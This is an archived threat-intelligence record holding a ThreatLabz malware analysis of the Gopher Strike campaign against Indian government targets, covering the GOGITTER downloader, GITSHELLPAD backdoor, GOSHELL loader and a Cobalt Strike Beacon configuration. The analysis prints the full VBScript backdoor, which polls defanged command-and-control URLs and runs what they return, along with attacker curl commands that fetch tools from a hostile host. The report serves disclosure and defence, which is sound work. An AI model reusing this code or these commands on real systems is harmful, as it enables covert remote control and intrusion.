{
	"id": "eff33807-18de-4ac6-92df-7ff0875402f4",
	"created_at": "2026-04-06T00:09:38.208427Z",
	"updated_at": "2026-04-10T03:24:23.757471Z",
	"deleted_at": null,
	"sha1_hash": "43d5bc8cc6248cfd43889c677e7cdb1cf023a624",
	"title": "GOGITTER, GITSHELLPAD, and GOSHELL Analysis | ThreatLabz",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 507802,
	"plain_text": "GOGITTER, GITSHELLPAD, and GOSHELL Analysis |\r\nThreatLabz\r\nBy Sudeep Singh, Yin Hong Chang\r\nPublished: 2026-01-26 · Archived: 2026-04-05 21:05:29 UTC\r\nTechnical Analysis\r\nIn the following sections, ThreatLabz discusses the technical details of the Gopher Strike campaign, including\r\nhow the GOGITTER downloader functions, the role of the GITSHELLPAD backdoor for C2 communication, and\r\nthe deployment of a Cobalt Strike Beacon using GOSHELL.\r\nGopher Strike campaign attack flow\r\nThe figure below shows the attack flow that leads to the deployment of Cobalt Strike.\r\nFigure 1: Shows how the Gopher Strike campaign leads to the deployment of Cobalt Strike.\r\nInitial infection vector\r\nhttps://www.zscaler.com/blogs/security-research/apt-attacks-target-indian-government-using-gogitter-gitshellpad-and-goshell\r\nPage 1 of 9\n\nThreatLabz traced the origins of the Gopher Striker campaign to multiple PDFs presumably sent in spear phishing\r\nemails. These PDFs contain a malicious link and a blurred image of legitimate documents that would be of interest\r\nto the victim. The image is designed to trick victims into downloading a fake Adobe Acrobat update to access the\r\ndocument's contents. The dialog is presented as a button labeled Download and Install, as shown in the figure\r\nbelow.\r\nFigure 2: Example of a PDF file used in the Gopher Strike campaign.\r\nIf the victim clicks the button, an ISO file containing the malicious payload is downloaded. During analysis,\r\nThreatLabz observed that the servers hosting the payload only respond with the ISO file when accessed from IP\r\naddresses in India, with a  User-Agent header representing a Windows platform. These server-side checks\r\nprevent automated URL analysis tools from fetching the ISO file, ensuring that the malicious file is only delivered\r\nto intended targets.\r\nGOGITTER downloader\r\nGOGITTER is a previously undocumented lightweight 64-bit Golang-based downloader. The following sections\r\noutline the key functionalities of the downloader.\r\nhttps://www.zscaler.com/blogs/security-research/apt-attacks-target-indian-government-using-gogitter-gitshellpad-and-goshell\r\nPage 2 of 9\n\nGOGITTER sequentially checks for the existence of the VBScript file  windows_api.vbs in the following\r\nlocations:\r\nC:\\Users\\Public\\Downloads\r\nC:\\Users\\Public\\Pictures\r\n%APPDATA%\r\nIf the VBScript is not found in any of the locations above, GOGITTER attempts to create a new file\r\nnamed  windows_api.vbs in the first accessible location. The contents of this VBScript are stored in plaintext\r\nwithin the binary.\r\nThe contents of the VBScript file  windows_api.vbs are included below.\r\nDim objHTTP, lastresponse, name, primaryURL, fallbackURL\r\nSet objHTTP = CreateObject(\"MSXML2.ServerXMLHTTP\")\r\nname = CreateObject(\"WScript.Network\").ComputerName\r\nprimaryURL = \"hxxps[:]//govt-filesharing[.]site/hpc5985.php?key=xvnd54\u0026info=Hello\" \u0026 name\r\nfallbackURL = \"hxxp[:]//ingov.myartsonline[.]com/hpc5985.php?key=xvnd54\u0026info=Hello\" \u0026 name\r\nlastresponse = \"\"\r\nFunction GetResponse(url)\r\n On Error Resume Next\r\n objHTTP.Open \"GET\", url, False\r\n objHTTP.setRequestHeader \"User-Agent\", \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,\r\n objHTTP.setRequestHeader \"Accept-Charset\", \"UTF-8\"\r\n objHTTP.setRequestHeader \"Accept-Language\", \"en-US,en;q=0.5\"\r\n objHTTP.Send\r\n If objHTTP.Status = 200 Then\r\n GetResponse = objHTTP.responseText\r\n Else\r\n GetResponse = \"\"\r\n End If\r\n On Error GoTo 0\r\nEnd Function\r\nDo\r\n responsebody = GetResponse(primaryURL)\r\n If responsebody = \"\" Then responsebody = GetResponse(fallbackURL)\r\n If responsebody \"\" And responsebody lastresponse Then\r\n If Left(responsebody, 3) = \"hi \" Then\r\n Execute Mid(responsebody, 4)\r\n lastresponse = responsebody\r\n End If\r\n End If\r\n WScript.Sleep 30000\r\nLoop\r\nhttps://www.zscaler.com/blogs/security-research/apt-attacks-target-indian-government-using-gogitter-gitshellpad-and-goshell\r\nPage 3 of 9\n\nThis newly-created VBScript contains two pre-configured C2 URLs that are used to fetch VBScript commands\r\nevery 30 seconds. The VBScript connects to the primary URL with a hardcoded User-Agent :  Mozilla/5.0\r\n(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110\r\nSafari/537.3 and two more pre-configured HTTP headers.\r\nIf the response from the C2 server begins with the string  hi , the remaining response strings are treated as\r\nVBScript commands and executed.\r\nIf the response from the primary URL is empty, the script retrieves the secondary URL.\r\nTo achieve persistence, a scheduled task is created with a dynamic name\r\n( MicrosoftEdge_ConfigurationUpdate_\u003c__random__\u003e ) where a random four digit number is generated at runtime.\r\nThis task is configured to execute the dropped windows_api.vbs script every 50 minutes.\r\nGOGITTER checks for the presence of the ZIP archive  adobe_update.zip in the aforementioned locations in the\r\nsame manner. If the file is not present, GOGITTER downloads a file named  adobe_update.zip from the private\r\nthreat actor-controlled GitHub repository\r\nat  hxxps[:]//raw.githubusercontent[.]com/jaishankai/sockv6/main/adobe_update.zip . A GitHub\r\nauthentication token embedded in the binary is used to authenticate and download the archive from the private\r\nrepository. The contents of  adobe_update.zip are extracted to one of the three installation folder locations,\r\ndropping the executable  edgehost.exe and a zero byte text document.\r\nGOGITTER then sends an HTTP GET request to the URL  adobe-acrobat[.]in/ninevmc987.php?\r\nfile=bncoeeav34564cvv94adfavc3354334dfsf , most likely to signal that the endpoint has been successfully\r\ninfected.\r\nGITSHELLPAD backdoor\r\nThe  edgehost.exe file is GITSHELLPAD, a 64-bit lightweight Golang-based backdoor that leverages threat\r\nactor-controlled private GitHub repositories for its C2 communication. The backdoor registers the victim with the\r\nC2 server, and polls the C2 for commands to execute. GITSHELLPAD uses GitHub’s REST API to create a new\r\ndirectory in the threat actor-controlled GitHub repository with the format:  SYSTEM- . GITSHELLPAD then adds\r\nthe file  info.txt into this new directory and commits the changes to the  main branch. The  info.txt file\r\ncontains the Base64-encoded string:  PC Name: SYSTEM- . \r\nGITSHELLPAD polls the threat actor-controlled GitHub account for new commands every 15 seconds by sending\r\na GET request to the GitHub REST Contents API endpoint for the file  command.txt . If GITSHELLPAD is\r\nunable to connect to GitHub to fetch  command.txt , it retries every 8 seconds. If the contents of  command.txt\r\nare empty, then GITSHELLPAD retries to fetch the content after 7 seconds.\r\nOnce the  command.txt file is successfully fetched, its contents are Base64-decoded to retrieve the command\r\nstring. The table below shows the commands supported by GITSHELLPAD.\r\nhttps://www.zscaler.com/blogs/security-research/apt-attacks-target-indian-government-using-gogitter-gitshellpad-and-goshell\r\nPage 4 of 9\n\nCommand Description\r\ncd .. Change working directory to parent directory.\r\ncd Change directory to the specified path.\r\nrun Run command in the background but don't capture the output.\r\nupload Upload the local file specified by the path to the GitHub repo.\r\ndownload Download a file to the specified path.\r\nDefault case Execute the command using  cmd /c and capture the output.\r\nTable 1: Commands supported by GITSHELLPAD.\r\nAll the logging messages detailing the command status and output are captured in the  result.txt file and\r\nuploaded to the threat actor's GitHub account via a PUT request. The  command.txt file is deleted from the threat\r\nactor-controlled GitHub repository after successful command execution on the endpoint.\r\nDuring the investigation, ThreatLabz discovered four threat actor-controlled private GitHub repositories and\r\nobserved more than 200 post-compromise commands issued by the threat actor. The table below lists a subset of\r\nthe post-compromise commands observed by ThreatLabz.\r\nCategory Description Sample Commands\r\nUser reconnaissance Collects information about the user.\r\nnet user\r\nwhoami\r\nSystem and network\r\nreconnaissance\r\nCollects information about the system\r\nand network configuration.\r\nsysteminfo\r\narp -a\r\ncurl ifconfig.me/ip\r\nhttps://www.zscaler.com/blogs/security-research/apt-attacks-target-indian-government-using-gogitter-gitshellpad-and-goshell\r\nPage 5 of 9\n\nCategory Description Sample Commands\r\nwmic logicaldisk get name\r\nNetwork connectivity\r\ncheck\r\nChecks connectivity to the C2 server.\r\ncurl -I https://adobe-acrobat[.]in\r\nDownload post-compromise toolsDownloads an archive to the victim’s\r\nfilesystem.\r\ncurl -L -o a.rar hxxps[:]//adobe-acrobat[.]in/a.rar\r\nClear filesystem traces Deletes filesystem artifacts. del /f /q svchost.rar\r\nClear running process\r\ntraces\r\nKills GITSHELLPAD related\r\nprocesses.\r\ntasklist | findstr CLEANUP\r\ntaskkill /F /PID 10572\r\nArchive extraction\r\nExtracts the contents of a downloaded\r\narchive.\r\ntar -xvf svchost.rar\r\nTable 2: A list of commands issued by the threat actor during the attack campaign. These commands are executed\r\nusing the GITSHELLPAD payload.\r\nA complete list of post-compromise commands are available in the ThreatLabz GitHub repository.\r\nGOSHELL loader\r\nAfter the threat actor gained access to the victim’s machine, ThreatLabz observed them downloading RAR\r\narchives containing post-compromise tools. The threat actors used the cURL commands shown in the table above\r\nto perform these downloads. The archives included tools that collect information from the compromised system.\r\nThe threat actor also utilized GOSHELL, a custom-built Golang-based loader, to deploy a Cobalt Strike Beacon.\r\nOnce the RAR archives were downloaded, they were extracted using the  tar utility, and the tools were deleted\r\nafter use. In this analysis, we focus only on the primary backdoor that was deployed.\r\nGOSHELL’s size was artificially inflated to approximately 1 gigabyte by adding junk bytes to the Portable\r\nExecutable (PE) overlay, likely to evade detection by antivirus software. These junk bytes were not entirely\r\nrandom but consisted of repeated byte sequences, such as:\r\nNull bytes\r\nSECURITY123456COMPRESSME!\r\nhttps://www.zscaler.com/blogs/security-research/apt-attacks-target-indian-government-using-gogitter-gitshellpad-and-goshell\r\nPage 6 of 9\n\n{AB CD EF 90 90 41 42 43 44 45 CC DE AD BE EF 00 FF 11 22 33}\r\nGOSHELL undergoes multiple decoding stages before eventually loading Cobalt Strike Beacon.\r\nGOSHELL only executes on specific hostnames by comparing the victim's hostname against a hardcoded list. \r\nIf no match is found, GOSHELL exits.\r\nIf a match is found, GOSHELL proceeds to decode the embedded second-stage shellcode. GOSHELL will:\r\n1. HEX-decode an embedded string and XOR the resulting bytes with  0xAA .\r\n2. Sleep for a random interval between three and seven seconds.\r\n3. Execute the second-stage shellcode within the same process using  QueueUserAPC .\r\nThis 32-bit second-stage shellcode is executed by the  QueueUserAPC call. It performs another layer of decoding.\r\nThe main purpose of the second-stage shellcode is to decrypt and load the next-stage Cobalt Strike payload.\r\nBelow are its key functionalities.\r\nAllocates executable memory.\r\nParses the PE header to extract the 4-byte XOR key  0x51211104 .\r\nCopies the next-stage encrypted shellcode to executable memory.\r\nDecrypts the encrypted shellcode using the 4-byte XOR key.\r\nInvokes the entry point of the next-stage shellcode.\r\nStage 3 is the final decoded payload, a stageless Cobalt Strike Beacon. ThreatLabz extracted the configuration,\r\nwhich appears to have been modified from a public profile.\r\nThe Cobalt Strike configuration is shown below.\r\nBeaconType - HTTPS\r\nPort - 443\r\nSleepTime - 45000\r\nMaxGetSize - 2801745\r\nJitter - 30\r\nMaxDNS - Not Found\r\nPublicKey_MD5 - 2e4e4ea817ad2286616f809ca84fc932\r\nC2Server - d18c3nlvb0n2a6.cloudfront.net,/jquery-3.3.1.min.js\r\nUserAgent - Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko\r\nHttpPostUri - /jquery-3.3.2.min.js\r\nMalleable_C2_Instructions - Remove 1522 bytes from the end\r\n Remove 84 bytes from the beginning\r\n Remove 3931 bytes from the beginning\r\n Base64 URL-safe decode\r\n XOR mask w/ random key\r\nHttpGet_Metadata - ConstHeaders\r\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n Referer: http://code.jquery.com/\r\n Accept-Encoding: gzip, deflate\r\n Metadata\r\nhttps://www.zscaler.com/blogs/security-research/apt-attacks-target-indian-government-using-gogitter-gitshellpad-and-goshell\r\nPage 7 of 9\n\nbase64url\r\n prepend \"__cfduid=\"\r\n header \"Cookie\"\r\nHttpPost_Metadata - ConstHeaders\r\n Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n Referer: http://code.jquery.com/\r\n Accept-Encoding: gzip, deflate\r\n SessionId\r\n mask\r\n base64url\r\n parameter \"__cfduid\"\r\n Output\r\n mask\r\n base64url\r\n print\r\nPipeName - Not Found\r\nDNS_Idle - Not Found\r\nDNS_Sleep - Not Found\r\nSSH_Host - Not Found\r\nSSH_Port - Not Found\r\nSSH_Username - Not Found\r\nSSH_Password_Plaintext - Not Found\r\nSSH_Password_Pubkey - Not Found\r\nSSH_Banner -\r\nHttpGet_Verb - GET\r\nHttpPost_Verb - POST\r\nHttpPostChunk - 0\r\nSpawnto_x86 - %windir%\\syswow64\\dllhost.exe\r\nSpawnto_x64 - %windir%\\sysnative\\dllhost.exe\r\nCryptoScheme - 0\r\nProxy_Config - Not Found\r\nProxy_User - Not Found\r\nProxy_Password - Not Found\r\nProxy_Behavior - Use IE settings\r\nWatermark_Hash - NtZOV6JzDr9QkEnX6bobPg==\r\nWatermark - 987654321\r\nbStageCleanup - True\r\nbCFGCaution - False\r\nKillDate - 0\r\nbProcInject_StartRWX - False\r\nbProcInject_UseRWX - False\r\nbProcInject_MinAllocSize - 17500\r\nProcInject_PrependAppend_x86 - b'\\x90\\x90'\r\n Empty\r\nProcInject_PrependAppend_x64 - b'\\x90\\x90'\r\n Empty\r\nProcInject_Execute - ntdll:RtlUserThreadStart\r\nhttps://www.zscaler.com/blogs/security-research/apt-attacks-target-indian-government-using-gogitter-gitshellpad-and-goshell\r\nPage 8 of 9\n\nCreateThread\r\n NtQueueApcThread-s\r\n CreateRemoteThread\r\n RtlCreateUserThread\r\nProcInject_AllocationMethod - NtMapViewOfSection\r\nbUsesCookies - True\r\nHostHeader -\r\nheadersToRemove - Not Found\r\nDNS_Beaconing - Not Found\r\nDNS_get_TypeA - Not Found\r\nDNS_get_TypeAAAA - Not Found\r\nDNS_get_TypeTXT - Not Found\r\nDNS_put_metadata - Not Found\r\nDNS_put_output - Not Found\r\nDNS_resolver - Not Found\r\nDNS_strategy - round-robin\r\nDNS_strategy_rotate_seconds - -1\r\nDNS_strategy_fail_x - -1\r\nDNS_strategy_fail_seconds - -1\r\nRetry_Max_Attempts - 0\r\nRetry_Increase_Attempts - 0\r\nRetry_Duration - 0\r\nSource: https://www.zscaler.com/blogs/security-research/apt-attacks-target-indian-government-using-gogitter-gitshellpad-and-goshell\r\nhttps://www.zscaler.com/blogs/security-research/apt-attacks-target-indian-government-using-gogitter-gitshellpad-and-goshell\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.zscaler.com/blogs/security-research/apt-attacks-target-indian-government-using-gogitter-gitshellpad-and-goshell"
	],
	"report_names": [
		"apt-attacks-target-indian-government-using-gogitter-gitshellpad-and-goshell"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434178,
	"ts_updated_at": 1775791463,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/43d5bc8cc6248cfd43889c677e7cdb1cf023a624.pdf",
		"text": "https://archive.orkl.eu/43d5bc8cc6248cfd43889c677e7cdb1cf023a624.txt",
		"img": "https://archive.orkl.eu/43d5bc8cc6248cfd43889c677e7cdb1cf023a624.jpg"
	}
}